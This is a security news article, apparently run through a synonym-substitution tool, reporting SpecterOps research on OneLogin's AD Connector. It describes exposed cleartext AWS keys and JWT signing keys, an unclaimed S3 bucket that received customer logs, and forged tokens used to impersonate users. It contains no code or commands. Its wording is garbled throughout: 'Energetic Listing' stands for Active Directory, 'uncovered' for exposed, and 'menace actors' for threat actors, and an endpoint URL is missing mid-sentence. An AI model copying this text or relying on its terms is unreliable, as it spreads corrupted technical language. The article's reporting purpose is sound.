A complete safety investigation has revealed crucial vulnerabilities in OneLogin’s Energetic Listing (AD) Connector service that uncovered authentication credentials and enabled attackers to impersonate authentic customers throughout enterprise environments.
The vulnerabilities, which have an effect on OneLogin’s widely-used identification and entry administration platform, demonstrated how menace actors might leverage uncovered credentials to generate legitimate JSON Net Tokens (JWT) and acquire unauthorized entry to buyer techniques.
The safety flaws emerged by analysis carried out on OneLogin’s trial tenant system, which gives potential prospects with entry to assessment the platform’s options and performance.
What started as routine safety evaluation shortly escalated when researchers found that OneLogin’s AD Connector service was inadvertently exposing delicate authentication supplies by its API endpoints.
The connector service, deployed as ConnectorService.exe on Home windows area controllers, was discovered to transmit unencrypted credentials by configuration API calls, creating a big assault floor for malicious actors.
SpecterOps analysts recognized a number of crucial publicity factors inside the OneLogin infrastructure, together with cleartext AWS credentials, API keys, and cryptographic signing keys important for JWT token technology.
The analysis revealed that attackers might exploit these uncovered credentials to craft authentic authentication tokens, successfully bypassing OneLogin’s safety controls and impersonating any person synchronized with the listing service.
Lab Setup (Supply – Specterops)
This vulnerability chain demonstrated a whole compromise state of affairs the place preliminary credential publicity might result in widespread unauthorized entry throughout a corporation’s federated purposes.
The impression of those vulnerabilities extends far past easy credential theft, as OneLogin serves as a centralized identification supplier for quite a few enterprise prospects.
When compromised, these techniques can present attackers with broad entry throughout a corporation’s total software ecosystem, together with cloud providers, on-premises purposes, and third-party integrations.
The analysis highlighted how identification federation platforms have grow to be high-value targets as a result of their central position in fashionable enterprise safety architectures.
Technical Exploitation Mechanism
The vulnerability exploitation course of centered on OneLogin’s configuration API endpoint positioned at which returned delicate configuration knowledge when queried with correct listing tokens.
Researchers found that this endpoint uncovered crucial info together with API keys, AWS AKIA person credentials in cleartext, and base64-encoded signing keys essential for JWT token creation.
The uncovered AWS credentials revealed a very regarding discovering when researchers tried to entry the referenced S3 bucket onelogin-adc-logs-production and found it was unclaimed.
By registering this bucket on a private AWS account, researchers started receiving manufacturing log recordsdata from an precise OneLogin buyer, containing detailed LDAP properties for all synchronized customers and legitimate listing tokens.
JWT tokens (Supply – Specterops)
This represented a whole breach of buyer knowledge confidentiality and highlighted systemic points in OneLogin’s infrastructure administration.
The technical exploitation relied closely on reverse engineering OneLogin’s .NET ConnectorService.exe binary to know JWT token building.
Utilizing decompilation instruments, researchers recognized the required JWT fields together with expiration time (exp), issuer (iss), viewers (aud), and topic (sub) values.
A Python script was developed to generate legitimate JWT tokens utilizing the uncovered signing keys, demonstrating the sensible exploit functionality.
The authentication course of concerned posting these crafted tokens to OneLogin’s SSO shopper URL, successfully bypassing all authentication controls and granting entry to federated purposes as any impersonated person.
This vulnerability chain represents a crucial failure in safe credential administration and API design, the place a single uncovered endpoint might compromise a complete buyer’s identification infrastructure.
The analysis underscores the significance of treating identification federation platforms as Tier 0 belongings requiring the best ranges of safety safety and monitoring.
Automate menace response with ANY.RUN’s TI Feeds—Enrich alerts and block malicious IPs throughout all endpoints -> Request full entry
